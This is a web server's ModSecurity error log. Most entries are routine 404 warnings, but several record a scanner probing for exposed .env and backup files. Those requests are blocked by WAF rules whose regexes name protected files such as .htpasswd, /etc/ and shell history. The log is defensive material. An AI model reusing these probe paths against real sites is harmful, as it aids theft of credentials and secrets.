[Tue May 26 17:53:21.098403 2026] [security2:error] [pid 937900:tid 938048] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQuE4hPNS8CpkGLtbhjAAAAJc"]
[Tue May 26 17:53:21.165846 2026] [security2:error] [pid 937900:tid 938064] [client 213.209.159.175:59512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.php.bak"] [unique_id "ahWQuU4hPNS8CpkGLtbhoQAAAKc"]
[Tue May 26 17:53:21.213479 2026] [core:crit] [pid 937900:tid 938045] (13)Permission denied: [client 51.77.74.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:53:21.555385 2026] [security2:error] [pid 937900:tid 938142] [client 213.209.159.175:59514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.php-bak"] [unique_id "ahWQuU4hPNS8CpkGLtbhsQAAAPU"]
[Tue May 26 17:53:21.942421 2026] [security2:error] [pid 937900:tid 938030] [client 213.209.159.175:59524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.php-backup"] [unique_id "ahWQuU4hPNS8CpkGLtbhtQAAAIU"]
[Tue May 26 17:53:22.335947 2026] [security2:error] [pid 937900:tid 938110] [client 213.209.159.175:59526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.php.backup"] [unique_id "ahWQuk4hPNS8CpkGLtbhvwAAANU"]
[Tue May 26 17:53:22.731645 2026] [security2:error] [pid 937900:tid 938039] [client 213.209.159.175:59536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/test/.env.php"] [unique_id "ahWQuk4hPNS8CpkGLtbhyQAAAI4"]
[Tue May 26 17:53:23.111704 2026] [security2:error] [pid 937900:tid 938082] [client 213.209.159.175:59538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.example.php"] [unique_id "ahWQu04hPNS8CpkGLtbh2AAAALk"]
[Tue May 26 17:53:23.499017 2026] [security2:error] [pid 937900:tid 938130] [client 213.209.159.175:59542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/app_dev.php/_profiler/.env"] [unique_id "ahWQu04hPNS8CpkGLtbh4gAAAOk"]
[Tue May 26 17:53:23.605407 2026] [security2:error] [pid 937900:tid 938083] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQu04hPNS8CpkGLtbh2wAAALo"]
[Tue May 26 17:53:23.894606 2026] [security2:error] [pid 937900:tid 938040] [client 213.209.159.175:59546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/var/.env.local.php"] [unique_id "ahWQu04hPNS8CpkGLtbh7gAAAI8"]
[Tue May 26 17:53:24.280222 2026] [security2:error] [pid 937900:tid 938048] [client 213.209.159.175:59560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/api/.env"] [unique_id "ahWQvE4hPNS8CpkGLtbh-QAAAJc"]
[Tue May 26 17:53:24.315870 2026] [security2:error] [pid 937900:tid 937912] [remote 14.161.17.36:44158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWQvE4hPNS8CpkGLtbh9wAA8As"]
[Tue May 26 17:53:24.409981 2026] [security2:error] [pid 937900:tid 938044] [client 213.209.159.175:59560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/app/.env"] [unique_id "ahWQvE4hPNS8CpkGLtbh_QAAAJM"]
[Tue May 26 17:53:25.412854 2026] [security2:error] [pid 937900:tid 938103] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQvU4hPNS8CpkGLtbiDwAAAM4"]
[Tue May 26 17:53:25.448020 2026] [security2:error] [pid 937900:tid 938106] [client 165.140.119.146:51564] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWQvU4hPNS8CpkGLtbiIAAAANE"], referer: https://www.bloggertarget.com
[Tue May 26 17:53:26.044337 2026] [security2:error] [pid 937900:tid 938039] [client 213.209.159.175:59604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/backend/.env"] [unique_id "ahWQvk4hPNS8CpkGLtbiNwAAAI4"]
[Tue May 26 17:53:26.174376 2026] [security2:error] [pid 937900:tid 938073] [client 213.209.159.175:59604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/core/.env"] [unique_id "ahWQvk4hPNS8CpkGLtbiOQAAALA"]
[Tue May 26 17:53:26.307920 2026] [security2:error] [pid 937900:tid 938089] [client 213.209.159.175:59604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/laravel/.env"] [unique_id "ahWQvk4hPNS8CpkGLtbiRgAAAMA"]
[Tue May 26 17:53:26.537930 2026] [security2:error] [pid 937900:tid 937909] [remote 47.128.117.4:11136] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "christinaspromotions.com"] [uri "/robots.txt"] [unique_id "ahWQvk4hPNS8CpkGLtbiVQAA5wg"]
[Tue May 26 17:53:27.338784 2026] [security2:error] [pid 937900:tid 938045] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbicQAAlB8"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.340612 2026] [security2:error] [pid 937900:tid 938076] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbicgAAszs"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.352544 2026] [security2:error] [pid 937900:tid 938121] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbicwAA4D4"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.474452 2026] [security2:error] [pid 937900:tid 938150] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbiegAA_Sk"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.485824 2026] [security2:error] [pid 937900:tid 938067] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbifgAAqiE"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.491304 2026] [security2:error] [pid 937900:tid 938117] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbihQAA3AM"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.497273 2026] [security2:error] [pid 937900:tid 938127] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbihAAA5h4"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.497803 2026] [security2:error] [pid 937900:tid 938137] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbihgAA8DY"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.499070 2026] [security2:error] [pid 937900:tid 938086] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbifAAAvUQ"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.501689 2026] [security2:error] [pid 937900:tid 938141] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbiggAA9BQ"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.505675 2026] [security2:error] [pid 937900:tid 938090] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbihwAAwW8"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.506570 2026] [security2:error] [pid 937900:tid 938047] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbifQAAlnI"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.511646 2026] [security2:error] [pid 937900:tid 938038] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbikQAAjSA"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.511877 2026] [security2:error] [pid 937900:tid 938088] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbijwAAvyc"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.515021 2026] [security2:error] [pid 937900:tid 938116] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbikAAAshI"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.519105 2026] [security2:error] [pid 937900:tid 938073] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbiiwAAsCo"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.520334 2026] [security2:error] [pid 937900:tid 938048] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbigwAAl20"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.523563 2026] [security2:error] [pid 937900:tid 938124] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbiiAAA4xY"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.524787 2026] [security2:error] [pid 937900:tid 938089] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbiiQAAwHA"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.525034 2026] [security2:error] [pid 937900:tid 938079] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbikgAAtlk"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.530787 2026] [security2:error] [pid 937900:tid 938063] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbijgAApnQ"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.533287 2026] [security2:error] [pid 937900:tid 938081] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbiigAAuCM"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.533289 2026] [security2:error] [pid 937900:tid 938066] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbigQAAqS8"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.533334 2026] [security2:error] [pid 937900:tid 938077] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbijAAAtEU"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:27.537619 2026] [security2:error] [pid 937900:tid 938039] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbigAAAjiU"], referer: https://ndequipments.com/listings/2015-john-deere-3033r-loader-backhoe-package/
[Tue May 26 17:53:28.100117 2026] [security2:error] [pid 937900:tid 938068] [client 123.22.65.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbilQAAAKs"]
[Tue May 26 17:53:28.207103 2026] [security2:error] [pid 937900:tid 938046] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQv04hPNS8CpkGLtbingAAAJU"]
[Tue May 26 17:53:28.451676 2026] [security2:error] [pid 937900:tid 938144] [client 213.209.159.175:51704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/packages/plugin-qiankun/examples/master/.env"] [unique_id "ahWQwE4hPNS8CpkGLtbirAAAAPc"]
[Tue May 26 17:53:30.523032 2026] [security2:error] [pid 937900:tid 938078] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQwk4hPNS8CpkGLtbi7QAAALU"]
[Tue May 26 17:53:31.585084 2026] [security2:error] [pid 937900:tid 938140] [client 213.209.159.175:51768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/lara/.env"] [unique_id "ahWQw04hPNS8CpkGLtbjGgAAAPM"]
[Tue May 26 17:53:31.713497 2026] [security2:error] [pid 937900:tid 938076] [client 213.209.159.175:51768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/Admin/.env"] [unique_id "ahWQw04hPNS8CpkGLtbjIQAAALM"]
[Tue May 26 17:53:32.332815 2026] [security2:error] [pid 937900:tid 938085] [client 213.209.159.175:51778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/.EnV"] [unique_id "ahWQxE4hPNS8CpkGLtbjNwAAALw"]
[Tue May 26 17:53:32.396666 2026] [security2:error] [pid 937900:tid 938063] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQw04hPNS8CpkGLtbjLwAAAKY"]
[Tue May 26 17:53:32.957900 2026] [security2:error] [pid 937900:tid 938138] [client 213.209.159.175:51790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/laravel/public/.env"] [unique_id "ahWQxE4hPNS8CpkGLtbjTQAAAPE"]
[Tue May 26 17:53:33.088753 2026] [security2:error] [pid 937900:tid 938088] [client 213.209.159.175:51790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/server/.env.bak"] [unique_id "ahWQxU4hPNS8CpkGLtbjUQAAAL8"]
[Tue May 26 17:53:35.195874 2026] [security2:error] [pid 937900:tid 938072] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQxk4hPNS8CpkGLtbjggAAAK8"]
